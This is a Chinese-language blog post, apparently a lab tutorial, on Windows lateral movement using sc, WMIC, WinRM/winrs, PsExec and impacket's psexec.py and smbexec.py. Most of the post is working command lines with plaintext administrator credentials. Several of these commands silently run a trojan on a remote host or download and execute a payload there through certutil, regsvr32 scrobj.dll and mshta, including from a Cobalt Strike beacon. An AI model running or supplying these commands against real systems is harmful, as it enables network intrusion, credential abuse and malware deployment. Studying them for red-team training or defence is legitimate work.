<p>SC详细命令：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/cnsend/p/12907229.html">https://www.cnblogs.com/cnsend/p/12907229.html</a></p>
<h4 id="SC远程注册服务"><a href="#SC远程注册服务" class="headerlink" title="SC远程注册服务"></a>SC远程注册服务</h4><figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs stata">#<span class="hljs-keyword">sc</span>远程创建服务<br><span class="hljs-keyword">sc</span> \\192.168.41.10 create <span class="hljs-keyword">test</span> binpath= <span class="hljs-string">&quot;c:\2.exe&quot;</span> obj= <span class="hljs-string">&quot;域\administrator&quot;</span><br>password= !@#qazwsx258<br>#<span class="hljs-keyword">sc</span>启动指定服务<br><span class="hljs-keyword">sc</span> \\192.168.41.10 start <span class="hljs-keyword">test</span><br>#<span class="hljs-keyword">sc</span>停止、删除指定服务<br><span class="hljs-keyword">sc</span> \\192.168.41.10 stop <span class="hljs-keyword">test</span><br><span class="hljs-keyword">sc</span> \\192.168.41.10 delete <span class="hljs-keyword">test</span><br></code></pre></td></tr></table></figure>

<h4 id="实操"><a href="#实操" class="headerlink" title="实操"></a>实操</h4><p>sc \192.168.41.10 create test binpath&#x3D; “c:\2.exe” obj&#x3D; “yf.com\administrator” password&#x3D; “!@#qazwsx258”</p>
<p><img src="https://s2.loli.net/2025/05/05/7phH2K6ERYiD8Gf.png" srcset="/img/loading.gif" lazyload alt="image-20241011171340321"></p>
<p>sc \192.168.41.10 start test<br>sc \192.168.41.10 stop test<br>sc \192.168.41.10 delete test</p>
<p>不过不知道哪里出问题了</p>
<p><img src="https://s2.loli.net/2025/05/05/7lSn3KMWCmixVBE.png" srcset="/img/loading.gif" lazyload alt="image-20241011165202308"></p>
<p>查看成功创建的服务</p>
<p><img src="https://s2.loli.net/2025/05/05/OK4P9mChWD6FGJV.png" srcset="/img/loading.gif" lazyload alt="image-20241011165652399"></p>
<p>注意：设置选项的每个’&#x3D;’后面都要有一个空格</p>
<p>具体原因没有找到，试了其他命令，也还是没有办法</p>
<hr>
<h3 id="2、WMIC"><a href="#2、WMIC" class="headerlink" title="2、WMIC"></a>2、WMIC</h3><p>WMIC（Windows Management Instrumentation Windows 管理规范）是用户管理本地和远程计算机的一个命令行模型。通过它可以访问、配置、管理、监视几乎所有的Windows资源。WMI的语法基本上和常见的命名空间、对象等用得几乎一摸一样，他对应Windows里的WMI服务（winmgmt）。</p>
<p>该服务存在于win 2000之后。WMIWMI使用公共信息模型（CIM）表示托管组件，其中包括系统、应用程序、网络等等。CIM中使用类表示管理对象，命名空间是一个类的集合。</p>
<p>通过使用135端口上的远程过程调用（RPC）进行通信进而进行远程访问，而WMIC是为WMI提供的命令行界面。</p>
<p><img src="https://s2.loli.net/2025/05/05/JHicXG8EUMtm5Fa.png" srcset="/img/loading.gif" lazyload alt="image-20241011173540453"></p>
<h4 id="命令利用条件"><a href="#命令利用条件" class="headerlink" title="命令利用条件"></a>命令利用条件</h4><ol>
<li>Windows Management Instrumentation 服务开启，端口TCP 135，默认开启</li>
<li>防火墙允许135、445等端口通信</li>
</ol>
<h4 id="利用方法"><a href="#利用方法" class="headerlink" title="利用方法"></a>利用方法</h4><ul>
<li>查询进程信息</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wmic /node:192.168.41.10 /user:administrator /password:!@<span class="hljs-comment">#qazwsx258 process list brief</span><br></code></pre></td></tr></table></figure>

<p>WMI不支持执行命令，而是支持执行文件，可以通过加相应的参数执行命令，并且执行指令、运行程序会隐性执行、运行，不会在桌面出现弹窗，如下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wmic /node:192.168.41.10 /user:administrator /password:!@<span class="hljs-comment">#qazwsx258 process call create &quot;cmd.exe /c ipconfig&quot;</span><br></code></pre></td></tr></table></figure>

<ul>
<li>利用create创建进程</li>
</ul>
<figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gauss">wmic process <span class="hljs-keyword">call</span> <span class="hljs-keyword">create</span> /?<br></code></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2025/05/05/TmUgXE1i8LObGhs.png" srcset="/img/loading.gif" lazyload alt="image-20241011202807170"></p>
<p>隐性运行木马</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wmic /node:192.168.41.10 /user:administrator /password:!@<span class="hljs-comment">#qazwsx258 process call create &quot;cmd /c c:\2.exe&quot;</span><br></code></pre></td></tr></table></figure>

<blockquote>
<p>如果出现User credentials cannot be used for local connections,应该是调用calc.exe程序权限不<br>够的问题<br>如果出现Description &#x3D; 无法启动服务，原因可能是已被禁用或与其相关联的设备没有启动，判断<br>WMI服务被禁用</p>
</blockquote>
<p>wmic命令缺点是没有回显，可以使用wmiexec.vbs脚本实现回显。</p>
<ul>
<li>下载远程文件并执行</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs sql">wmic <span class="hljs-operator">/</span>node:<span class="hljs-number">192.168</span><span class="hljs-number">.41</span><span class="hljs-number">.10</span> <span class="hljs-operator">/</span><span class="hljs-keyword">user</span>:administrator <span class="hljs-operator">/</span>password:<span class="hljs-number">1</span>qaz<span class="hljs-variable">@WSX3e</span> process <span class="hljs-keyword">call</span><br><span class="hljs-keyword">create</span> &quot;cmd /c certutil.exe -urlcache -split -f http://192.168.41.10/test.exe<br>c:/windows/temp/test.exe &amp; c:/windows/temp/test.exe&quot;<br><br>wmic <span class="hljs-operator">/</span>node:<span class="hljs-number">192.168</span><span class="hljs-number">.41</span><span class="hljs-number">.10</span> <span class="hljs-operator">/</span><span class="hljs-keyword">user</span>:administrator <span class="hljs-operator">/</span>password:<span class="hljs-number">1</span>qaz<span class="hljs-variable">@WSX3e</span> process <span class="hljs-keyword">call</span><br><span class="hljs-keyword">create</span> &quot;regsvr32 /s /n /u /i:http://192.168.41.10:8080/feY7nzY.sct scrobj.dll&quot;<br></code></pre></td></tr></table></figure>

<h3 id="3、WinRM"><a href="#3、WinRM" class="headerlink" title="3、WinRM"></a>3、WinRM</h3><p><strong>注</strong>：出网机设置为Win10系统，win等其他机器的自带工具的版本会给实验带来不便。</p>
<p>winRM是一种WIndows系统中的远程管理服务，它通过WS-Management协议进行远程管理和脚本执行。该服务的端口默认为5985（HTTP）、5986（HTTPS，要配置证书）。在windows server 2012及其之后的版本都是默认启用的，不过还是要手动配置TrustedHosts（信任主机名单）、身份验证和防火墙规则。</p>
<h4 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h4><p>在双方都开启WinRM服务的时候，跳板机需要将目标机器的 IP 地址或主机名添加到 TrustedHosts 列表中，以便能够进行身份验证和连接。如果没有将目标机加入 TrustedHosts 列表，跳板机将无法通过 IP 地址进行连接目标。（<strong>域用户可以不是加入TrustedHosts列表，也能连接</strong>）</p>
<h4 id="配置实验环境"><a href="#配置实验环境" class="headerlink" title="配置实验环境"></a>配置实验环境</h4><h5 id="1、开启WinRM"><a href="#1、开启WinRM" class="headerlink" title="1、开启WinRM"></a>1、开启WinRM</h5><ul>
<li>判断本地是否开启WinRM服务</li>
</ul>
<figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs arduino">winrm enumerate winrm/config/listener   <span class="hljs-comment">//下面是未开启的状态</span><br></code></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2025/05/05/5lzjvty97qBZeAO.png" srcset="/img/loading.gif" lazyload alt="image-20241011204202556"></p>
<p>WinRM 服务在当前网络配置下无法运行，因为网络连接类型被设置为“公用”，而 WinRM 防火墙例外只适用于“专用”或“域”网络。使用Powershell5及其以上版本的命令来修改连接</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-built_in">Get-NetConnectionProfile</span>  <span class="hljs-comment">#查看当前的网络配置</span><br></code></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2025/05/05/IM2lNnSwtAQveZF.png" srcset="/img/loading.gif" lazyload alt="image-20241013132556286"></p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-comment">#把未识别网络的那个网卡修改为专有</span><br><span class="hljs-attribute">Set</span>-NetConnectionProfile -InterfaceIndex <span class="hljs-number">5</span> -NetworkCategory Private<br></code></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2025/05/05/LRE3aFd7ftZziqM.png" srcset="/img/loading.gif" lazyload alt="image-20241013133457254"></p>
<p>再次开启winRM</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">winrm quickconfig</span><br></code></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2025/05/05/JGinQExIzNKLods.png" srcset="/img/loading.gif" lazyload alt="image-20241013133602151"></p>
<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs 1c"><span class="hljs-meta">#查看WinRM服务端进程</span><br>netstat -ano <span class="hljs-string">| findstr 5985</span><br>或者<br>wmic service list brief <span class="hljs-string">| findstr WinRM</span><br></code></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2025/05/05/YdnlmNokfpG9JZO.png" srcset="/img/loading.gif" lazyload alt="image-20241013133724486"></p>
<ul>
<li>判断目标主机是否开启WinRM</li>
</ul>
<p>直接通过端口扫描，探查出目标机可能使用WinRM服务</p>
<p><img src="https://s2.loli.net/2025/05/05/5Kz6Fj4yrDtPuEI.png" srcset="/img/loading.gif" lazyload alt="image-20241013134352244"></p>
<h4 id="Winrs执行命令"><a href="#Winrs执行命令" class="headerlink" title="Winrs执行命令"></a>Winrs执行命令</h4><p><strong>WinRS</strong>（Windows Remote Shell）是基于 <strong>WinRM</strong>（Windows 远程管理服务）的一种远程命令执行工具，它允许你在远程 Windows 计算机上执行命令。</p>
<p>ipconfig</p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">winrs</span> -r:http://192.168.41.10:5985 -u:administrator -p:!@<span class="hljs-comment">#qazwsx258 ipconfig</span><br></code></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2025/05/05/OVc25NvnQ7f3UEA.png" srcset="/img/loading.gif" lazyload alt="image-20241013134509418"></p>
<p>远程下载木马（此处用的正向）（要在跳板机上搭建一个IISweb服务）</p>
<figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs perl">winrs -r:http:<span class="hljs-regexp">//</span><span class="hljs-number">192.168</span>.<span class="hljs-number">41.10</span>:<span class="hljs-number">5985</span> -u:administrator -p:!@#qazwsx258 <span class="hljs-string">&quot;certutil -urlcache -split -f http://192.168.41.10/2.exe c:\2.exe&quot;</span><br></code></pre></td></tr></table></figure>



<h4 id="WinRm横向移动"><a href="#WinRm横向移动" class="headerlink" title="WinRm横向移动"></a>WinRm横向移动</h4><ul>
<li>利用winrm参数选项中的invoke参数，来对目标对象执行特定的方法。</li>
</ul>
<figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs smali">winrm<span class="hljs-built_in"> invoke </span>create wmicimv2/win32_process @&#123;Commandline=<span class="hljs-string">&quot;calc.exe&quot;</span>&#125;<br></code></pre></td></tr></table></figure>

<blockquote>
<p>命令调用了Windows WMI中Win32_process类的Create方法，生成了一个calc.exe的新进程</p>
</blockquote>
<ul>
<li>在远程主机上打开进程</li>
</ul>
<figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs smali">winrm<span class="hljs-built_in"> invoke </span>create wmicimv2/win32_process @&#123;Commandline=<span class="hljs-string">&quot;calc.exe&quot;</span>&#125; -r:http://192.168.41.10:5985 -u:administrator -p:!@<span class="hljs-comment">#qazwsx258</span><br></code></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2025/05/05/Mqyapbnsi29WP5J.png" srcset="/img/loading.gif" lazyload alt="image-20241013135149570"></p>
<p><img src="https://s2.loli.net/2025/05/05/QvGMhZ8iSIgXApr.png" srcset="/img/loading.gif" lazyload alt="image-20241013135126032"></p>
<ul>
<li>在远程主机上创建服务</li>
</ul>
<figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs smali">winrm<span class="hljs-built_in"> invoke </span>Create wmicimv2/Win32_Service @&#123;Name=<span class="hljs-string">&quot;test&quot;</span>;DisplayName=<span class="hljs-string">&quot;test&quot;</span>;PathName=<span class="hljs-string">&quot;cmd.exe /k c:\2.exe&quot;</span>&#125; -r:http://192.168.41.10:5985 -u:administrator -p:!@<span class="hljs-comment">#qazwsx258</span><br></code></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2025/05/05/k3aEmhWSsLd5eUw.png" srcset="/img/loading.gif" lazyload alt="image-20241013141115524"></p>
<ul>
<li>在远程机器上启动服务</li>
</ul>
<figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs smali">winrm<span class="hljs-built_in"> invoke </span>StartService wmicimv2/Win32_Service?Name=test -r:http://192.168.41.10:5985 -u:administrator -p:!@<span class="hljs-comment">#qazwsx258</span><br></code></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2025/05/05/79PQAuD4Xroe1LH.png" srcset="/img/loading.gif" lazyload alt="image-20241013141112706"></p>
<p><strong>注</strong>：如果返回值为23，可以利用下面命令删除服务，再重新创建并运行即可</p>
<p><img src="https://s2.loli.net/2025/05/05/OvykoHxZcRChgsb.png" srcset="/img/loading.gif" lazyload alt="image-20241013141018695"></p>
<figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs smali">winrm<span class="hljs-built_in"> invoke </span>Delete wmicimv2/Win32_Service?Name=test -r:http://192.168.41.10:5985 -u:administrator -p:!@<span class="hljs-comment">#qazwsx258</span><br></code></pre></td></tr></table></figure>

<p>然后直接连接即可</p>
<p><img src="C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20241013151814389.png" srcset="/img/loading.gif" lazyload alt="image-20241013151814389"></p>
<h2 id="横向移动外部工具篇"><a href="#横向移动外部工具篇" class="headerlink" title="横向移动外部工具篇"></a>横向移动外部工具篇</h2><h3 id="Psexec"><a href="#Psexec" class="headerlink" title="Psexec"></a>Psexec</h3><h4 id="Psexec简介"><a href="#Psexec简介" class="headerlink" title="Psexec简介"></a>Psexec简介</h4><p>PsExec是telnet的轻量替代品，可以让你在其他主机上执行进程。并为控制台应用程序提供完整的交互性，而无需手动安装客户端软件。</p>
<h4 id="Psexec原理-流程使用"><a href="#Psexec原理-流程使用" class="headerlink" title="Psexec原理&amp;流程使用"></a>Psexec原理&amp;流程使用</h4><ol>
<li><code>ips$</code>把Psexesvc.exe安装到目标机</li>
<li>通过服务管理 OpenSCManager 打开受害者机器上服务控制管理器的句柄</li>
<li>通过CreateService创建服务</li>
<li>获取服务句柄 OpenService 使用 StartService 启动服务</li>
</ol>
<h4 id="Psexec使用前提"><a href="#Psexec使用前提" class="headerlink" title="Psexec使用前提"></a>Psexec使用前提</h4><ol>
<li>对方主机开启了admin$共享，如果关闭了 admin$ 共享，会提示：找不到网络名</li>
<li>对方未开启防火墙</li>
<li>如果是工作组环境，则必须使用 administrator 用户连接（因为要在目标主机上面创建并启动服<br>务），使用其他账号(包括管理员组中的非administrator用户)登录都会提示访问拒绝访问。</li>
<li>如果是域环境，即可用普通域用户连接也可以用域管理员用户连接。连接普通域主机可以用普通域用户，连接域控只能用域管理员账户。</li>
</ol>
<h4 id="Psexec-exe使用"><a href="#Psexec-exe使用" class="headerlink" title="Psexec.exe使用"></a>Psexec.exe使用</h4><p>1、直接使用</p>
<p>如果出现找不到网络名，判断目标主机已禁用ADMIN$共享，且第一次运行会弹框,输入 –accepteula 这个参数就可以绕</p>
<figure class="highlight livescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs livescript">.<span class="hljs-string">\PsExec.exe</span> <span class="hljs-string">\\192.168.41.10</span> -u de1ay<span class="hljs-string">\Administrator</span> -p !@<span class="hljs-comment">#qazwsx258 -s cmd.exe -accepteula</span><br></code></pre></td></tr></table></figure>

<p>2、建立IPC后使用</p>
<figure class="highlight livescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs livescript">net use <span class="hljs-string">\\IP</span> /u:域名称<span class="hljs-string">\域账号</span> 密码<br>反弹cmd：<br>psexec.exe <span class="hljs-string">\\192.168.41.10</span> -s cmd.exe -accepteula<br>执行命令：<br>psexec.exe <span class="hljs-string">\\192.168.41.10</span> whoami -accepteula<br></code></pre></td></tr></table></figure>

<p>使用手册：重要参数</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs stylus">-c &lt;<span class="hljs-selector-attr">[路径]</span>文件名&gt;:拷贝文件到远程机器并运行（注意：运行结束后文件会自动删除）<br>-d 不等待程序执行完就返回<br>比如想上传一个本地的getpass到你远程连接的服务器上去:<br>Psexec<span class="hljs-selector-class">.exe</span> \\ip -u user -<span class="hljs-selector-tag">p</span> pass -c c:\getpass<span class="hljs-selector-class">.exe</span> –d<br></code></pre></td></tr></table></figure>

<p>3、CS自带PSexec</p>
<figure class="highlight livescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs livescript">beacon&gt; shell psexec.exe <span class="hljs-string">\\192.168.41.10</span> -u de1ay<span class="hljs-string">\Administrator</span> -p <span class="hljs-number">1qaz</span>@WSX3e whoami<br>beacon&gt; shell psexec.exe <span class="hljs-string">\\192.168.41.10</span> -u de1ay<span class="hljs-string">\Administrator</span> -p <span class="hljs-number">1qaz</span>@WSX3e mshta http:<span class="hljs-regexp">//192.168.41.10:8088/download/file.ext  <span class="hljs-comment">#不加双引号</span></span><br></code></pre></td></tr></table></figure>

<h4 id="Psexec-py的使用"><a href="#Psexec-py的使用" class="headerlink" title="Psexec.py的使用"></a>Psexec.py的使用</h4><p>impacket套件中的Psexec与官方psexec.exe相比会自动删除服务，增加隐蔽性</p>
<p>为了惊扰机器，我们可以通过代理技术，在本地直接用工具测试</p>
<p>交互式命令行</p>
<figure class="highlight avrasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs avrasm"><span class="hljs-symbol">C:</span>\&gt;psexec.py yf/administrator:!@<span class="hljs-meta">#qazwsx258@192.168.41.10</span><br><br>就会在本地开启目标机的cmd<br></code></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2025/05/05/bVAqlwN2hknMZU6.png" srcset="/img/loading.gif" lazyload alt="image-20241013185515626"></p>
<p>直接执行命令</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs angelscript">C:\&gt;psexec.exe de1ay/administrator:<span class="hljs-symbol">1qaz@</span><span class="hljs-symbol">WSX3e@</span><span class="hljs-number">10.10</span><span class="hljs-number">.10</span><span class="hljs-number">.201</span> whoami<br></code></pre></td></tr></table></figure>

<p>cs使用</p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs llvm">shell <span class="hljs-keyword">c</span>:\psexec.exe administrator:<span class="hljs-number">1</span>qaz<span class="hljs-title">@WSX</span><span class="hljs-title">@10</span>.<span class="hljs-number">10.10</span>.<span class="hljs-number">201</span> whoami<br><br>shell <span class="hljs-keyword">c</span>:\psexec.exe administrator:<span class="hljs-number">1</span>qaz<span class="hljs-title">@WSX</span><span class="hljs-title">@10</span>.<span class="hljs-number">10.10</span>.<span class="hljs-number">201</span> mshta http://<span class="hljs-number">192.168</span>.<span class="hljs-number">78.104</span>:<span class="hljs-number">80</span>/download/file.ext<br></code></pre></td></tr></table></figure>

<h3 id="Smbexec-py"><a href="#Smbexec-py" class="headerlink" title="Smbexec.py"></a>Smbexec.py</h3><p>impacket套件<br>smbexec是一款基于psexec的域渗透测试工具，并配套samba工具。</p>
<p>445端口</p>
<figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs smali">C:\&gt;smbexec.py de1ay/administrator:1qaz@WSX3e@10.10.10.201<br>Impacket v0.9.17 - Copyright 2019 SecureAuth Corporation<br>[!] Launching semi-interactive shell - Careful what you<span class="hljs-built_in"> execute</span><br><span class="hljs-built_in"></span>C:\Windows\system32&gt;<br></code></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2025/05/05/XnpYGLP9Ekh3iR4.png" srcset="/img/loading.gif" lazyload alt="image-20241013185704780"></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>横向移动基础篇</div>
      <div>http://example.com/2025/05/05/横向移动基础篇/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Yf3te</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年5月5日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/05/05/shell%E2%80%94ssh%E2%80%94%E7%97%95%E8%BF%B9%E6%93%A6%E9%99%A4/" title="shell—ssh—痕迹擦除">
                        <span class="hidden-mobile">shell—ssh—痕迹擦除</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"nPsiBpqAh9nfJ5Dy1WuaF7QX-MdYXbMMI","appKey":"uHgPDZvMgamWIL1SjZs4NpY4","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量
        <span id="leancloud-site-pv"></span>
        次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数
        <span id="leancloud-site-uv"></span>
        人
      </span>
    
    

  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>




  
